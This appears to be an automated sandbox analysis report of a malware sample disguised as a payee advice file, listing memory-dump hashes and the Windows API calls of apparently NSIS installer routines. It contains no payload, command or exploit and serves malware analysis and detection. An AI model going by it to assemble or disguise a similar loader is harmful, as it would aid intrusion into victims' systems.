                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 69d9eb272f91d8ba412a0b4fa1e7f48eb1783f632d535ff1254c96434f32d920
                                                                                                                                          • Instruction ID: d0a0110acbb39c5e63e514c208ecf0e16ec56e579fe9df89d1d8359d9ae37b8b
                                                                                                                                          • Opcode Fuzzy Hash: 69d9eb272f91d8ba412a0b4fa1e7f48eb1783f632d535ff1254c96434f32d920
                                                                                                                                          • Instruction Fuzzy Hash: D1D1A178E10218CFDB54DFA9C980B9DBBB2BF89300F2080A9D909AB355DB355D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 81147e75353942af70cfbbaea0bb3085fae26b24a7a9baf631ecb3f2528ca81e
                                                                                                                                          • Instruction ID: b7d121a2e73ce0674abda1696041be77321309ee41153940410d4e546fbbf144
                                                                                                                                          • Opcode Fuzzy Hash: 81147e75353942af70cfbbaea0bb3085fae26b24a7a9baf631ecb3f2528ca81e
                                                                                                                                          • Instruction Fuzzy Hash: 9CD1A178E10218CFDB54DFA9C990B9DBBB2BF89300F2080A9D909AB355DB355D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 768146598380743b2d49157d11dbfc7eb8772b30a22568a864f997809aff801a
                                                                                                                                          • Instruction ID: be322fa4c5b4da48d9369f08689085dea688e5ace46c4b0fe27af290597ea97c
                                                                                                                                          • Opcode Fuzzy Hash: 768146598380743b2d49157d11dbfc7eb8772b30a22568a864f997809aff801a
                                                                                                                                          • Instruction Fuzzy Hash: 16D1A178E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D909AB355DB315D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fa8af9fea260036e3759d6cff0b65249ba6da560ea69d2dbf1ccf192c735023b
                                                                                                                                          • Instruction ID: ccee2be39639b07e99eb186941e3373ba6489e8cd6dbdb865eabc47c8baa05f7
                                                                                                                                          • Opcode Fuzzy Hash: fa8af9fea260036e3759d6cff0b65249ba6da560ea69d2dbf1ccf192c735023b
                                                                                                                                          • Instruction Fuzzy Hash: 30C1D274E10218CFDB54DFA5C944B9DBBB2BF89300F2081AAD809AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3d3643d024b0cf6a75926e23a6f70855324f78ccb89273635c46c3f0e3fb0d71
                                                                                                                                          • Instruction ID: af33ed138b63c3de5e6172431d5e6e9a77f7e482debd5270542aa550e8b25c8a
                                                                                                                                          • Opcode Fuzzy Hash: 3d3643d024b0cf6a75926e23a6f70855324f78ccb89273635c46c3f0e3fb0d71
                                                                                                                                          • Instruction Fuzzy Hash: 81C1B374E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0501f6102f794833600e0869a7dddb29b4e41157681544e8d5dd18d31ce91380
                                                                                                                                          • Instruction ID: 49b5dbc8345dd16f6715f8fd1e068d3922d98a54a85b483b4299e67d1635d9cf
                                                                                                                                          • Opcode Fuzzy Hash: 0501f6102f794833600e0869a7dddb29b4e41157681544e8d5dd18d31ce91380
                                                                                                                                          • Instruction Fuzzy Hash: A5C1B274E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB355DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c140cda148e5bcc5219eb5e141b65f0ef1f7be74e544a4fd8e5ca6ed2ae171f
                                                                                                                                          • Instruction ID: 75a1be4dab565e5ff09c143ca75b71efe86ba2931feb5be3868f5393c617f0b2
                                                                                                                                          • Opcode Fuzzy Hash: 7c140cda148e5bcc5219eb5e141b65f0ef1f7be74e544a4fd8e5ca6ed2ae171f
                                                                                                                                          • Instruction Fuzzy Hash: F9C1B274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8332e7fe70a73d5f7228d7651d795723ac30ffeae77e6d1620952616f817cd48
                                                                                                                                          • Instruction ID: 99cbacfe5108d2614c4a8e0a838fdae64eba9bcc3f65d21abce26b3e3ba62529
                                                                                                                                          • Opcode Fuzzy Hash: 8332e7fe70a73d5f7228d7651d795723ac30ffeae77e6d1620952616f817cd48
                                                                                                                                          • Instruction Fuzzy Hash: B0C1A374E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD809AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5ef790968e02457f435d00b239aa27797a8ae7885db32def04a270aa78a585cc
                                                                                                                                          • Instruction ID: 3c1d709e5de141312518cd7ecac0b0d0d0ecc0f0b7037d057247b3371dff81ad
                                                                                                                                          • Opcode Fuzzy Hash: 5ef790968e02457f435d00b239aa27797a8ae7885db32def04a270aa78a585cc
                                                                                                                                          • Instruction Fuzzy Hash: 99C1B374E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9a91ea10cc2d366a83187fd53122b46bab4858e371a0859ada4a8f83f5f3d2ae
                                                                                                                                          • Instruction ID: bdff9a7eea5058f163bfc0a3d0557af421d572a229624bb3e977095b87f02a40
                                                                                                                                          • Opcode Fuzzy Hash: 9a91ea10cc2d366a83187fd53122b46bab4858e371a0859ada4a8f83f5f3d2ae
                                                                                                                                          • Instruction Fuzzy Hash: 0FC1B374E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b9450353159a5c2a0714f824728bf3399ffd79f1023fd58ae08eda7826bfb82a
                                                                                                                                          • Instruction ID: 44673b5c76d1accdb6b6f3d46cd5ba4711f62266eb611510967281b1cf35dd25
                                                                                                                                          • Opcode Fuzzy Hash: b9450353159a5c2a0714f824728bf3399ffd79f1023fd58ae08eda7826bfb82a
                                                                                                                                          • Instruction Fuzzy Hash: 1FC1A274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1fca0620aa4daa1f458a10b76e5472c12d918d475d2a05b42d45c74c50b06372
                                                                                                                                          • Instruction ID: ef59011ca59fa8fd5da45688b99425a625e0ddf9eaa4d77a3788ef1861502b9e
                                                                                                                                          • Opcode Fuzzy Hash: 1fca0620aa4daa1f458a10b76e5472c12d918d475d2a05b42d45c74c50b06372
                                                                                                                                          • Instruction Fuzzy Hash: 38C1B274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8053242d8930e868b6b0e09fc335907156c601c977699b7a7ee78681c64e93b5
                                                                                                                                          • Instruction ID: aec56b887523a0a674ca7f9f14111f3920fcae11be6d041ac837708a4d678ba9
                                                                                                                                          • Opcode Fuzzy Hash: 8053242d8930e868b6b0e09fc335907156c601c977699b7a7ee78681c64e93b5
                                                                                                                                          • Instruction Fuzzy Hash: 79C1A274E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB355DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 91118f4ffe157178db19ad14826e2595c67bd6ad6671e6fef8dfbb4ce02331f0
                                                                                                                                          • Instruction ID: 635d81ae35e7d0bcb66728771b3050e092b02316ed7cc5e0bb2b529c39082e44
                                                                                                                                          • Opcode Fuzzy Hash: 91118f4ffe157178db19ad14826e2595c67bd6ad6671e6fef8dfbb4ce02331f0
                                                                                                                                          • Instruction Fuzzy Hash: 42A1BC74A01268DFDB64DF64C894BDABBB2BB4A305F5084EAD40EA7350CB319E81CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d5dd5ec4de7ab123732380db5333e6561015977a444f09a6af6320046435bbf5
                                                                                                                                          • Instruction ID: 840f352f193863ce0d5769c7169f107396ad05ee8c66305b1fb638729cd0bfb7
                                                                                                                                          • Opcode Fuzzy Hash: d5dd5ec4de7ab123732380db5333e6561015977a444f09a6af6320046435bbf5
                                                                                                                                          • Instruction Fuzzy Hash: E1519E74A01229DFCB64DF64C854BAAB7B2FB4A305F5085EAD40EA7350CB319E82CF50
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                            • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                          • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                          • CloseClipboard.USER32 ref: 00405658
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                          • String ID: {
                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                          • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                          • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                          • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                          • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                          APIs
                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                          • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                          • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 184305955-0
                                                                                                                                          • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                          • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                          • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                          • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,75923420,00000000,00434000), ref: 00403935
                                                                                                                                          • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                                                          • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                          • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                          • API String ID: 914957316-1115850852
                                                                                                                                          • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                          • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                          • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                          • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                                                          APIs
                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                          • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                          • String ID: CB@$N$open
                                                                                                                                          • API String ID: 3615053054-4029390422
                                                                                                                                          • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
